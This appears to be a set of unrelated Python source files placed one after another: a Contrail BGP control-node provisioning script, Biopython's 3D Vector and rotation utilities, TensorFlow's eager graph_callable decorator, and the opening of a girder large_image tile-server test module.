self._args.local_autonomous_system,
self._args.bgp_server_port)
else:
bp_obj.add_bgp_router('control-node', self._args.host_name,
self._args.host_ip, self._args.router_asn,
self._args.address_families, self._args.md5,
self._args.local_autonomous_system,
self._args.bgp_server_port)
elif self._args.oper == 'del':
bp_obj.del_bgp_router(self._args.host_name)
else:
print "Unknown operation %s. Only 'add' and 'del' supported"\
% (self._args.oper)
# end __init__
def gr_time_type(self, value):
time = int(value)
if time < 0 or time > 4095:
raise argparse.ArgumentTypeError("graceful_restart_time %s must be in range (0..4095)" % value)
return time
def llgr_time_type(self, value):
time = int(value)
if time < 0 or time > 16777215:
raise argparse.ArgumentTypeError("long_lived_graceful_restart_time %s must be in range (0..16777215)" % value)
return time
def _parse_args(self, args_str):
'''
Eg. python provision_control.py --host_name a3s30.contrail.juniper.net
--host_ip 10.1.1.1
--router_asn 64512
--ibgp_auto_mesh|--no_ibgp_auto_mesh
--api_server_ip 127.0.0.1
--api_server_port 8082
--api_server_use_ssl False
--oper <add | del>
--md5 <key value>|None(optional)
--bgp_server_port <port>|None(optional)
--local_autonomous_system <ASN value>|None(optional)
--graceful_restart_time 300
--long_lived_graceful_restart_time 300
--end_of_rib_timeout 300
--set_graceful_restart_parameters False
--graceful_restart_bgp_helper_enable False
--graceful_restart_xmpp_helper_enable False
--graceful_restart_enable False
'''
# Source any specified config/ini file
# Turn off help, so we print all options in response to -h
conf_parser = argparse.ArgumentParser(add_help=False)
conf_parser.add_argument("-c", "--conf_file",
help="Specify config file", metavar="FILE")
args, remaining_argv = conf_parser.parse_known_args(args_str.split())
defaults = {
'router_asn': '64512',
'bgp_server_port': 179,
'local_autonomous_system': None,
'ibgp_auto_mesh': None,
'api_server_ip': '127.0.0.1',
'api_server_port': '8082',
'api_server_use_ssl': False,
'oper': None,
'admin_user': None,
'admin_password': None,
'admin_tenant_name': None,
'md5' : None,
'graceful_restart_time': 300,
'long_lived_graceful_restart_time': 300,
'end_of_rib_timeout': 300,
'graceful_restart_bgp_helper_enable': False,
'graceful_restart_xmpp_helper_enable': False,
'graceful_restart_enable': False,
'set_graceful_restart_parameters': False,
'sub_cluster_name': None,
'peer_list':None,
}
if args.conf_file:
config = ConfigParser.SafeConfigParser()
config.read([args.conf_file])
defaults.update(dict(config.items("DEFAULTS")))
# Override with CLI options
        # Don't suppress add_help here so it will handle -h
parser = argparse.ArgumentParser(
# Inherit options from config_parser
parents=[conf_parser],
# print script description with -h/--help
description=__doc__,
# Don't mess with format of description
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.set_defaults(**defaults)
parser.add_argument(
"--host_name", help="hostname name of control-node")
parser.add_argument("--host_ip", help="IP address of control-node")
parser.add_argument(
"--router_asn", help="AS Number the control-node is in", required=True)
parser.add_argument(
"--bgp_server_port", help="BGP server port number (Default: 179)")
parser.add_argument(
"--local_autonomous_system", help="Local autonomous-system number used to peer contrail-control bgp speakers across different geographic locations")
parser.add_argument(
"--address_families", help="Address family list",
choices=["route-target", "inet-vpn", "e-vpn", "erm-vpn", "inet6-vpn"],
nargs="*", default=[])
parser.add_argument(
"--md5", help="Md5 config for the node")
parser.add_argument(
"--ibgp_auto_mesh", help="Create iBGP mesh automatically", dest='ibgp_auto_mesh', action='store_true')
parser.add_argument(
"--no_ibgp_auto_mesh", help="Don't create iBGP mesh automatically", dest='ibgp_auto_mesh', action='store_false')
parser.add_argument("--api_server_port", help="Port of api server")
parser.add_argument("--api_server_use_ssl",
help="Use SSL to connect with API server")
parser.add_argument(
"--oper",
help="Provision operation to be done(add or del)")
parser.add_argument(
"--admin_user", help="Name of keystone admin user")
parser.add_argument(
"--admin_password", help="Password of keystone admin user")
parser.add_argument(
"--admin_tenant_name", help="Tenamt name for keystone admin user")
parser.add_argument(
"--graceful_restart_time",
help="Graceful Restart Time in seconds (0..4095)",
type=self.gr_time_type, default=300,
required=False)
parser.add_argument(
"--long_lived_graceful_restart_time",
help="Long Lived Graceful Restart Time in seconds (0..16777215)",
type=self.llgr_time_type, default=300,
required=False)
parser.add_argument(
"--end_of_rib_timeout",
help="EndOfRib timeout value in seconds (0..4095)",
type=self.gr_time_type, default=300,
required=False)
parser.add_argument("--graceful_restart_bgp_helper_enable",
action='store_true',
help="Enable helper mode for BGP graceful restart")
parser.add_argument("--graceful_restart_xmpp_helper_enable",
action='store_true',
help="Enable helper mode for XMPP graceful restart")
parser.add_argument("--graceful_restart_enable",
action='store_true',
help="Enable Graceful Restart")
parser.add_argument("--set_graceful_restart_parameters",
action='store_true',
help="Set Graceful Restart Parameters")
parser.add_argument(
"--sub_cluster_name", help="sub cluster to associate to",
required=False)
parser.add_argument(
"--peer_list", help="list of control node names to peer",
required=False)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument(
"--api_server_ip", help="IP address of api server",
nargs='+', type=str)
group.add_argument("--use_admin_api",
default=False,
help = "Connect to local api-server on admin port",
action="store_true")
self._args = parser.parse_args(remaining_argv)
# end _parse_args
# end class ControlProvisioner
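# The option handling in _parse_args() above follows a two-stage argparse
# pattern: a bare parser first consumes only --conf_file, values read from that
# file seed the defaults, and the real parser (built with parents=[conf_parser])
# lets command-line flags override them. A minimal standalone sketch of the same
# pattern (not used by this script; the option name and DEFAULTS section below
# are illustrative):
def _example_two_stage_parse(argv):
    conf_parser = argparse.ArgumentParser(add_help=False)
    conf_parser.add_argument("-c", "--conf_file", metavar="FILE")
    args, remaining = conf_parser.parse_known_args(argv)
    defaults = {'router_asn': '64512'}
    if args.conf_file:
        config = ConfigParser.SafeConfigParser()
        config.read([args.conf_file])
        defaults.update(dict(config.items("DEFAULTS")))
    parser = argparse.ArgumentParser(parents=[conf_parser])
    parser.set_defaults(**defaults)
    parser.add_argument("--router_asn")
    return parser.parse_args(remaining)
# end _example_two_stage_parse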
def main(args_str=None):
ControlProvisioner(args_str)
# end main
if __name__ == "__main__":
main()
|
|
# Copyright (C) 2004, Thomas Hamelryck ([email protected])
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Vector class, including rotation-related functions."""
import numpy
def m2rotaxis(m):
"""
    Return the angle, axis pair that corresponds to rotation matrix m.
"""
# Angle always between 0 and pi
# Sense of rotation is defined by axis orientation
t=0.5*(numpy.trace(m)-1)
t=max(-1, t)
t=min(1, t)
angle=numpy.arccos(t)
if angle<1e-15:
# Angle is 0
return 0.0, Vector(1,0,0)
elif angle<numpy.pi:
# Angle is smaller than pi
x=m[2,1]-m[1,2]
y=m[0,2]-m[2,0]
z=m[1,0]-m[0,1]
axis=Vector(x,y,z)
axis.normalize()
return angle, axis
else:
# Angle is pi - special case!
m00=m[0,0]
m11=m[1,1]
m22=m[2,2]
if m00>m11 and m00>m22:
            # For a rotation by pi, m = 2*n*n^T - I, so the diagonal entries
            # give the axis directly: n_x = 0.5*sqrt(m00-m11-m22+1), etc.
            x=0.5*numpy.sqrt(m00-m11-m22+1)
            y=m[0,1]/(2*x)
            z=m[0,2]/(2*x)
        elif m11>m00 and m11>m22:
            y=0.5*numpy.sqrt(m11-m00-m22+1)
            x=m[0,1]/(2*y)
            z=m[1,2]/(2*y)
        else:
            z=0.5*numpy.sqrt(m22-m00-m11+1)
            x=m[0,2]/(2*z)
            y=m[1,2]/(2*z)
axis=Vector(x,y,z)
axis.normalize()
return numpy.pi, axis
def vector_to_axis(line, point):
"""
    Return the vector between a point and
    the closest point on a line (i.e. the perpendicular
    projection of the point on the line).
@type line: L{Vector}
@param line: vector defining a line
@type point: L{Vector}
@param point: vector defining the point
"""
line=line.normalized()
np=point.norm()
angle=line.angle(point)
return point-line**(np*numpy.cos(angle))
def rotaxis2m(theta, vector):
"""
Calculate a left multiplying rotation matrix that rotates
theta rad around vector.
Example:
>>> m=rotaxis(pi, Vector(1,0,0))
>>> rotated_vector=any_vector.left_multiply(m)
@type theta: float
@param theta: the rotation angle
@type vector: L{Vector}
@param vector: the rotation axis
@return: The rotation matrix, a 3x3 Numeric array.
"""
vector=vector.copy()
vector.normalize()
c=numpy.cos(theta)
s=numpy.sin(theta)
t=1-c
x,y,z=vector.get_array()
rot=numpy.zeros((3,3))
# 1st row
rot[0,0]=t*x*x+c
rot[0,1]=t*x*y-s*z
rot[0,2]=t*x*z+s*y
# 2nd row
rot[1,0]=t*x*y+s*z
rot[1,1]=t*y*y+c
rot[1,2]=t*y*z-s*x
# 3rd row
rot[2,0]=t*x*z-s*y
rot[2,1]=t*y*z+s*x
rot[2,2]=t*z*z+c
return rot
rotaxis=rotaxis2m
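# Round-trip sketch (illustrative only, not part of the module API): build a
# rotation matrix from an angle/axis pair and recover both with m2rotaxis.
#
#   m = rotaxis2m(numpy.pi/2, Vector(0, 0, 1))
#   angle, axis = m2rotaxis(m)
#   # angle ~= pi/2 and axis ~= Vector(0, 0, 1), up to rounding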
def refmat(p,q):
"""
Return a (left multiplying) matrix that mirrors p onto q.
Example:
>>> mirror=refmat(p,q)
>>> qq=p.left_multiply(mirror)
>>> print q, qq # q and qq should be the same
@type p,q: L{Vector}
@return: The mirror operation, a 3x3 Numeric array.
"""
p.normalize()
q.normalize()
if (p-q).norm()<1e-5:
return numpy.identity(3)
pq=p-q
pq.normalize()
b=pq.get_array()
b.shape=(3, 1)
i=numpy.identity(3)
ref=i-2*numpy.dot(b, numpy.transpose(b))
return ref
def rotmat(p,q):
"""
Return a (left multiplying) matrix that rotates p onto q.
Example:
>>> r=rotmat(p,q)
>>> print q, p.left_multiply(r)
@param p: moving vector
@type p: L{Vector}
@param q: fixed vector
@type q: L{Vector}
@return: rotation matrix that rotates p onto q
@rtype: 3x3 Numeric array
"""
rot=numpy.dot(refmat(q, -p), refmat(p, -p))
return rot
def calc_angle(v1, v2, v3):
"""
Calculate the angle between 3 vectors
representing 3 connected points.
    @param v1, v2, v3: the three points that define the angle
@type v1, v2, v3: L{Vector}
@return: angle
@rtype: float
"""
v1=v1-v2
v3=v3-v2
return v1.angle(v3)
def calc_dihedral(v1, v2, v3, v4):
"""
Calculate the dihedral angle between 4 vectors
representing 4 connected points. The angle is in
]-pi, pi].
@param v1, v2, v3, v4: the four points that define the dihedral angle
@type v1, v2, v3, v4: L{Vector}
"""
ab=v1-v2
cb=v3-v2
db=v4-v3
u=ab**cb
v=db**cb
w=u**v
angle=u.angle(v)
# Determine sign of angle
try:
if cb.angle(w)>0.001:
angle=-angle
except ZeroDivisionError:
# dihedral=pi
pass
return angle
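# Sign-convention sketch (illustrative): the four points used in the module
# self-test at the bottom of this file give a positive dihedral, i.e. a value
# in ]0, pi] rather than ]-pi, 0].
#
#   v1, v2, v3, v4 = Vector(0, 0, 1), Vector(0, 0, 0), Vector(0, 1, 0), Vector(1, 1, 0)
#   calc_dihedral(v1, v2, v3, v4)   # > 0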
class Vector(object):
"3D vector"
def __init__(self, x, y=None, z=None):
if y is None and z is None:
# Array, list, tuple...
if len(x)!=3:
raise ValueError("Vector: x is not a "
"list/tuple/array of 3 numbers")
self._ar=numpy.array(x, 'd')
else:
# Three numbers
self._ar=numpy.array((x, y, z), 'd')
def __repr__(self):
x,y,z=self._ar
return "<Vector %.2f, %.2f, %.2f>" % (x,y,z)
def __neg__(self):
"Return Vector(-x, -y, -z)"
a=-self._ar
return Vector(a)
def __add__(self, other):
"Return Vector+other Vector or scalar"
if isinstance(other, Vector):
a=self._ar+other._ar
else:
a=self._ar+numpy.array(other)
return Vector(a)
def __sub__(self, other):
"Return Vector-other Vector or scalar"
if isinstance(other, Vector):
a=self._ar-other._ar
else:
a=self._ar-numpy.array(other)
return Vector(a)
def __mul__(self, other):
"Return Vector.Vector (dot product)"
return sum(self._ar*other._ar)
def __div__(self, x):
"Return Vector(coords/a)"
a=self._ar/numpy.array(x)
return Vector(a)
def __pow__(self, other):
"Return VectorxVector (cross product) or Vectorxscalar"
if isinstance(other, Vector):
a,b,c=self._ar
d,e,f=other._ar
c1=numpy.linalg.det(numpy.array(((b,c), (e,f))))
c2=-numpy.linalg.det(numpy.array(((a,c), (d,f))))
c3=numpy.linalg.det(numpy.array(((a,b), (d,e))))
return Vector(c1,c2,c3)
else:
a=self._ar*numpy.array(other)
return Vector(a)
def __getitem__(self, i):
return self._ar[i]
def __setitem__(self, i, value):
self._ar[i]=value
def norm(self):
"Return vector norm"
return numpy.sqrt(sum(self._ar*self._ar))
def normsq(self):
"Return square of vector norm"
return abs(sum(self._ar*self._ar))
def normalize(self):
"Normalize the Vector"
self._ar=self._ar/self.norm()
def normalized(self):
"Return a normalized copy of the Vector"
v=self.copy()
v.normalize()
return v
def angle(self, other):
"Return angle between two vectors"
n1=self.norm()
n2=other.norm()
c=(self*other)/(n1*n2)
# Take care of roundoff errors
c=min(c,1)
c=max(-1,c)
return numpy.arccos(c)
def get_array(self):
"Return (a copy of) the array of coordinates"
return numpy.array(self._ar)
def left_multiply(self, matrix):
"Return Vector=Matrix x Vector"
a=numpy.dot(matrix, self._ar)
return Vector(a)
def right_multiply(self, matrix):
"Return Vector=Vector x Matrix"
a=numpy.dot(self._ar, matrix)
return Vector(a)
def copy(self):
"Return a deep copy of the Vector"
return Vector(self._ar)
if __name__=="__main__":
from numpy.random import random
v1=Vector(0,0,1)
v2=Vector(0,0,0)
v3=Vector(0,1,0)
v4=Vector(1,1,0)
v4.normalize()
print v4
print calc_angle(v1, v2, v3)
dih=calc_dihedral(v1, v2, v3, v4)
# Test dihedral sign
assert(dih>0)
print "DIHEDRAL ", dih
ref=refmat(v1, v3)
rot=rotmat(v1, v3)
print v3
print v1.left_multiply(ref)
print v1.left_multiply(rot)
print v1.right_multiply(numpy.transpose(rot))
# -
print v1-v2
print v1-1
print v1+(1,2,3)
# +
print v1+v2
print v1+3
print v1-(1,2,3)
# *
print v1*v2
# /
print v1/2
print v1/(1,2,3)
# **
print v1**v2
print v1**2
print v1**(1,2,3)
# norm
print v1.norm()
# norm squared
print v1.normsq()
# setitem
v1[2]=10
print v1
# getitem
print v1[2]
print numpy.array(v1)
print "ROT"
angle=random()*numpy.pi
axis=Vector(random(3)-random(3))
axis.normalize()
m=rotaxis(angle, axis)
cangle, caxis=m2rotaxis(m)
print angle-cangle
print axis-caxis
print
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Decorator that produces a callable object that executes a TensorFlow graph.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import tape
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops as tf_ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
def _default_initializer(name, shape, dtype):
"""The default initializer for variables."""
# pylint: disable=protected-access
store = variable_scope._get_default_variable_store()
initializer = store._get_default_initializer(name, shape=shape, dtype=dtype)
# pylint: enable=protected-access
return initializer[0]
class _CapturedVariable(object):
"""Variable captured by graph_callable.
Internal to the implementation of graph_callable. Created only by
_VariableCapturingScope and used only to read the variable values when calling
the function after the variables are initialized.
"""
def __init__(self, name, initializer, shape, dtype, trainable):
self.name = name
if initializer is None:
initializer = _default_initializer(name, shape, dtype)
initial_value = lambda: initializer(shape, dtype=dtype)
with context.eager_mode():
self.variable = resource_variable_ops.ResourceVariable(
initial_value=initial_value, name=name, dtype=dtype,
trainable=trainable)
self.shape = shape
self.dtype = dtype
self.placeholder = None
self.trainable = trainable
def read(self, want_gradients=True):
if want_gradients and self.trainable:
v = tape.watch_variable(self.variable)
else:
v = self.variable
return v.read_value()
class _VariableCapturingScope(object):
"""Variable-scope-like object which captures tf.get_variable calls.
This is responsible for the main difference between the initialization version
of a function object and the calling version of a function object.
capturing_scope replaces calls to tf.get_variable with placeholder tensors to
be fed the variable's current value. TODO(apassos): these placeholders should
instead be objects implementing a similar API to tf.Variable, for full
compatibility.
initializing_scope replaces calls to tf.get_variable with creation of
variables and initialization of their values. This allows eventual support of
initialized_value and friends.
TODO(apassos): once the eager mode layers API is implemented support eager
func-to-object as well.
"""
def __init__(self):
self.variables = {}
self.tf_variables = {}
@contextlib.contextmanager
def capturing_scope(self):
"""Context manager to capture variable creations.
Replaces variable accesses with placeholders.
Yields:
nothing
"""
# TODO(apassos) ignoring the regularizer and partitioner here; figure out
# how to deal with these.
def _custom_getter(getter=None, name=None, shape=None, dtype=dtypes.float32, # pylint: disable=missing-docstring
initializer=None, regularizer=None, reuse=None,
trainable=True, collections=None, caching_device=None, # pylint: disable=redefined-outer-name
partitioner=None, validate_shape=True,
use_resource=None):
del getter, regularizer, partitioner, validate_shape, use_resource, dtype
      del collections, initializer, trainable, reuse, caching_device, shape
assert name in self.variables
v = self.variables[name]
return v.variable
scope = variable_scope.get_variable_scope()
with variable_scope.variable_scope(scope, custom_getter=_custom_getter):
yield
@contextlib.contextmanager
def initializing_scope(self):
"""Context manager to capture variable creations.
Forcibly initializes all created variables.
Yields:
nothing
"""
# TODO(apassos) ignoring the regularizer and partitioner here; figure out
# how to deal with these.
def _custom_getter(getter=None, name=None, shape=None, dtype=dtypes.float32, # pylint: disable=missing-docstring
initializer=None, regularizer=None, reuse=None,
trainable=True, collections=None, caching_device=None, # pylint: disable=redefined-outer-name
partitioner=None, validate_shape=True,
use_resource=None):
del getter, regularizer, collections, caching_device, partitioner
del use_resource, validate_shape
if name in self.tf_variables:
if reuse:
return self.tf_variables[name].initialized_value()
else:
raise ValueError("Specified reuse=%s but tried to reuse variables."
% reuse)
# TODO(apassos): ensure this is on the same device as above
v = _CapturedVariable(name, initializer, shape, dtype, trainable)
self.variables[name] = v
graph_mode_resource = v.variable.handle
if initializer is None:
initializer = _default_initializer(name, shape, dtype)
resource_variable_ops.shape_safe_assign_variable_handle(
graph_mode_resource, v.variable.shape, initializer(shape, dtype))
return v.variable
scope = variable_scope.get_variable_scope()
with variable_scope.variable_scope(scope, custom_getter=_custom_getter):
yield
class _InitializingFunctionObject(object):
"""Responsible for deciding which version of func-to-object to call.
call_fn is the version which calls the function with the current values of the
variables and init_fn is the version which calls the function to initialize
all variables.
TODO(apassos): figure out a way to support initializing only _some_
variables. This requires a way to pull out a variable's initialization code
from the graph, which might not be possible in general.
"""
def __init__(self, call_fn, init_fn, shape_and_dtypes):
self._init_fn = init_fn
self._call_fn = call_fn
self.shape_and_dtypes = shape_and_dtypes
self.flattened_shapes = [tensor_shape.as_shape(sd.shape) for sd in
nest.flatten(self.shape_and_dtypes)]
@property
def variables(self):
return self._call_fn.variables
def __call__(self, *args):
nest.assert_same_structure(self.shape_and_dtypes, args, check_types=False)
if not all([
shape.is_compatible_with(arg.shape)
for shape, arg in zip(self.flattened_shapes, nest.flatten(args))
]):
raise ValueError(
"Declared shapes do not match argument shapes: Expected %s, found %s."
% (self.flattened_shapes, [arg.shape for arg in nest.flatten(args)]))
initialized = [resource_variable_ops.var_is_initialized_op(
v.handle).numpy() for v in self._call_fn.variables]
if all(x for x in initialized):
for v in self._call_fn.variables:
if v._trainable: # pylint: disable=protected-access
tape.watch_variable(v)
return self._call_fn(*args)
elif all(not x for x in initialized):
return self._init_fn(*args)
else:
raise ValueError("Some, but not all, variables are initialized.")
def _get_graph_callable_inputs(shape_and_dtypes):
"""Maps specified shape_and_dtypes to graph inputs."""
ret = []
for x in shape_and_dtypes:
if isinstance(x, ShapeAndDtype):
ret.append(array_ops.placeholder(x.dtype, x.shape))
elif isinstance(x, (tuple, list)):
ret.append(_get_graph_callable_inputs(x))
else:
raise errors.InvalidArgumentError(
None, None, "Expected the argument to @graph_callable to be a "
"(possibly nested) list or tuple of ShapeAndDtype objects, "
"but got an object of type: %s" % type(x))
return tuple(ret) if isinstance(shape_and_dtypes, tuple) else ret
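# For example (illustrative shapes and dtypes, not tied to any particular
# model): a nested specification such as
#   [ShapeAndDtype((2,), dtypes.float32), (ShapeAndDtype((), dtypes.int32),)]
# is mapped to a matching nested structure of placeholders, with the outer
# list and the inner tuple nesting preserved.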
def _graph_callable_internal(func, shape_and_dtypes):
"""Defines and returns a template version of func.
Under the hood we make two function objects, each wrapping a different version
of the graph-mode code. One version immediately runs variable initialization
before making the variable's Tensors available for use, while the other
version replaces the Variables with placeholders which become function
arguments and get the current variable's value.
Limitations in (2) and (4) are because this does not implement a graph-mode
  Variable class which has a convert_to_tensor(as_ref=True) method and an
  initialized_value method. This is fixable.
Args:
func: The tfe Python function to compile.
shape_and_dtypes: A possibly nested list or tuple of ShapeAndDtype objects.
Raises:
ValueError: If any one of func's outputs is not a Tensor.
Returns:
Callable graph object.
"""
container = tf_ops.get_default_graph()._container # pylint: disable=protected-access
graph_key = tf_ops.get_default_graph()._graph_key # pylint: disable=protected-access
with context.graph_mode():
# This graph will store both the initialization and the call version of the
# wrapped function. It will later be used by the backprop code to build the
# backprop graph, if necessary.
captures = {}
tmp_graph = function.CapturingGraph(captures)
# Inherit the graph key from the original graph to ensure optimizers don't
# misbehave.
tmp_graph._container = container # pylint: disable=protected-access
tmp_graph._graph_key = graph_key # pylint: disable=protected-access
with tmp_graph.as_default():
# Placeholders for the non-variable inputs.
func_inputs = _get_graph_callable_inputs(shape_and_dtypes)
func_num_args = len(tf_inspect.getargspec(func).args)
if len(func_inputs) != func_num_args:
raise TypeError("The number of arguments accepted by the decorated "
"function `%s` (%d) must match the number of "
"ShapeAndDtype objects passed to the graph_callable() "
"decorator (%d)." %
(func.__name__, func_num_args, len(func_inputs)))
# First call the function to generate a graph which can initialize all
# variables. As a side-effect this will populate the variable capturing
# scope's view of which variables exist.
variable_captures = _VariableCapturingScope()
with variable_captures.initializing_scope(), function.capture_tensors(
captures), function.AutomaticControlDependencies() as a:
func_outputs = func(*func_inputs)
outputs_list = nest.flatten(func_outputs)
for i, x in enumerate(outputs_list):
if x is not None:
outputs_list[i] = a.mark_as_return(x)
if len(outputs_list) == 1 and outputs_list[0] is None:
outputs_list = []
output_shapes = [x.shape for x in outputs_list]
if not all(isinstance(x, tf_ops.Tensor) for x in outputs_list):
raise ValueError("Found non-tensor output in %s" % str(outputs_list))
initializing_operations = tmp_graph.get_operations()
# Call the function again, now replacing usages of variables with
# placeholders. This assumes the variable capturing scope created above
# knows about all variables.
tmp_graph.clear_resource_control_flow_state()
with variable_captures.capturing_scope(), function.capture_tensors(
captures), function.AutomaticControlDependencies() as a:
captured_outputs = func(*func_inputs)
captured_outlist = nest.flatten(captured_outputs)
for i, x in enumerate(captured_outlist):
if x is not None:
captured_outlist[i] = a.mark_as_return(x)
capturing_operations = tmp_graph.get_operations()[
len(initializing_operations):]
sorted_variables = sorted(variable_captures.variables.values(),
key=lambda x: x.name)
ids = list(sorted(captures.keys()))
if ids:
extra_inputs, extra_placeholders = zip(*[captures[x] for x in ids])
else:
extra_inputs = []
extra_placeholders = []
flat_inputs = [x for x in nest.flatten(func_inputs)
if isinstance(x, tf_ops.Tensor)]
    placeholder_inputs = flat_inputs + list(extra_placeholders)
func_def_outputs = [x for x in outputs_list if isinstance(x, tf_ops.Tensor)]
initialization_name = function._inference_name(func.__name__) # pylint: disable=protected-access
# TODO(ashankar): Oh lord, forgive me for this lint travesty.
# Also, what about the gradient registry of these functions? Those need to be
# addressed as well.
for f in tmp_graph._functions.values(): # pylint: disable=protected-access
function._register(f._c_func.func) # pylint: disable=protected-access
initializer_function = function.GraphModeFunction(
initialization_name,
placeholder_inputs,
extra_inputs,
tmp_graph,
initializing_operations,
func_def_outputs,
func_outputs,
output_shapes)
capture_func_def_outputs = [
x for x in captured_outlist if isinstance(x, tf_ops.Tensor)]
captured_function_name = function._inference_name(func.__name__) # pylint: disable=protected-access
captured_function = function.GraphModeFunction(
captured_function_name,
placeholder_inputs,
extra_inputs,
tmp_graph,
capturing_operations,
capture_func_def_outputs,
captured_outputs,
output_shapes,
variables=[x.variable for x in sorted_variables])
return _InitializingFunctionObject(captured_function, initializer_function,
shape_and_dtypes)
class ShapeAndDtype(object):
"""Data type that packages together shape and type information.
Used for arguments to graph callables. See graph_callable() for an example.
"""
def __init__(self, shape, dtype):
self.shape = shape
self.dtype = dtype
def graph_callable(shape_and_dtypes):
"""Decorator that produces a callable that executes a TensorFlow graph.
When applied on a function that constructs a TensorFlow graph, this decorator
produces a callable object that:
1. Executes the graph when invoked. The first call will initialize any
variables defined in the graph.
  2. Provides a .variables property that returns the list of TensorFlow variables
defined in the graph.
Note that the wrapped function is not allowed to change the values of the
variables, just use them.
The return value of the wrapped function must be one of the following:
(1) None, (2) a Tensor, or (3) a possibly nested sequence of Tensors.
Example:
```python
  @tfe.graph_callable([tfe.ShapeAndDtype(shape=(), dtype=dtypes.float32)])
def foo(x):
v = tf.get_variable('v', initializer=tf.ones_initializer(), shape=())
return v + x
ret = foo(tfe.Tensor(2.0)) # `ret` here is a Tensor with value 3.0.
foo.variables[0].assign(7.0) # Modify the value of variable `v`.
ret = foo(tfe.Tensor(2.0)) # `ret` here now is a Tensor with value 9.0.
```
Args:
shape_and_dtypes: A possibly nested list or tuple of ShapeAndDtype objects
that specifies shape and type information for each of the callable's
arguments. The length of this list must be equal to the number of
arguments accepted by the wrapped function.
Returns:
A callable graph object.
"""
# TODO(alive,apassos): support initialized_value and friends from tf.Variable.
assert context.executing_eagerly(), (
"graph_callable can only be used when Eager execution is enabled.")
def decorator(func):
return tf_decorator.make_decorator(func,
_graph_callable_internal(
func, shape_and_dtypes))
return decorator
|
|
import math
from unittest import mock
import os
import pytest
import requests
import shutil
import struct
import time
from girder.constants import SortDir
from girder.models.file import File
from girder.models.item import Item
from girder.models.setting import Setting
from girder.models.token import Token
from girder.models.user import User
from girder_jobs.models.job import Job
from girder_large_image.models.image_item import ImageItem
from large_image import getTileSource
from girder_large_image import constants
from girder_large_image import getGirderTileSource
from girder_large_image import loadmodelcache
from . import girder_utilities as utilities
def _testTilesZXY(server, admin, itemId, metadata, tileParams=None,
imgHeader=utilities.JPEGHeader, token=None):
"""
Test that the tile server is serving images.
:param itemId: the item ID to get tiles from.
:param metadata: tile information used to determine the expected
valid queries. If 'sparse' is added to it, tiles
are allowed to not exist above that level.
:param tileParams: optional parameters to send to the tile query.
:param imgHeader: if something other than a JPEG is expected, this is
the first few bytes of the expected image.
"""
if tileParams is None:
tileParams = {}
if token:
kwargs = {'token': token}
else:
kwargs = {'user': admin}
# We should get images for all valid levels, but only within the
# expected range of tiles.
for z in range(metadata.get('minLevel', 0), metadata['levels']):
maxX = math.ceil(float(metadata['sizeX']) * 2 ** (
z - metadata['levels'] + 1) / metadata['tileWidth']) - 1
maxY = math.ceil(float(metadata['sizeY']) * 2 ** (
z - metadata['levels'] + 1) / metadata['tileHeight']) - 1
# Check the four corners on each level
for (x, y) in ((0, 0), (maxX, 0), (0, maxY), (maxX, maxY)):
resp = server.request(path='/item/%s/tiles/zxy/%d/%d/%d' % (
itemId, z, x, y), params=tileParams, isJson=False,
**kwargs)
if (resp.output_status[:3] != b'200' and
metadata.get('sparse') and z > metadata['sparse']):
assert utilities.respStatus(resp) == 404
continue
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(imgHeader)] == imgHeader
# Check out of range each level
for (x, y) in ((-1, 0), (maxX + 1, 0), (0, -1), (0, maxY + 1)):
resp = server.request(path='/item/%s/tiles/zxy/%d/%d/%d' % (
itemId, z, x, y), params=tileParams, **kwargs)
if x < 0 or y < 0:
assert utilities.respStatus(resp) == 400
assert 'must be positive integers' in resp.json['message']
else:
assert utilities.respStatus(resp) == 404
assert ('does not exist' in resp.json['message'] or
'outside layer' in resp.json['message'])
# Check negative z level
resp = server.request(path='/item/%s/tiles/zxy/-1/0/0' % itemId,
params=tileParams, **kwargs)
assert utilities.respStatus(resp) == 400
assert 'must be positive integers' in resp.json['message']
# Check non-integer z level
resp = server.request(path='/item/%s/tiles/zxy/abc/0/0' % itemId,
params=tileParams, **kwargs)
assert utilities.respStatus(resp) == 400
assert 'must be integers' in resp.json['message']
# If we set the minLevel, test one lower than it
if 'minLevel' in metadata:
resp = server.request(path='/item/%s/tiles/zxy/%d/0/0' % (
itemId, metadata['minLevel'] - 1), params=tileParams, **kwargs)
assert utilities.respStatus(resp) == 404
assert 'layer does not exist' in resp.json['message']
# Check too large z level
resp = server.request(path='/item/%s/tiles/zxy/%d/0/0' % (
itemId, metadata['levels']), params=tileParams, **kwargs)
assert utilities.respStatus(resp) == 404
assert 'layer does not exist' in resp.json['message']
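# The z/x/y loop above derives the last valid tile index at each level from the
# image size. A small standalone sketch of that arithmetic (not used by the
# tests themselves; the numbers in the docstring match the sample PTIF metadata
# checked in testTilesFromPTIF below):
def _exampleMaxTileIndices(metadata, z):
    """Return (maxX, maxY) for level z.

    For a 58368 x 12288 image with 256-pixel tiles and 9 levels this yields
    (227, 47) at z=8 (full resolution) and (0, 0) at z=0 (the whole image fits
    in the single 0/0 tile).
    """
    scale = 2 ** (z - metadata['levels'] + 1)
    maxX = math.ceil(float(metadata['sizeX']) * scale / metadata['tileWidth']) - 1
    maxY = math.ceil(float(metadata['sizeY']) * scale / metadata['tileHeight']) - 1
    return maxX, maxY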
def _createTestTiles(server, admin, params=None, info=None, error=None):
"""
Discard any existing tile set on an item, then create a test tile set
with some optional parameters.
:param params: optional parameters to use for the tiles.
:param info: if present, the tile information must match all values in
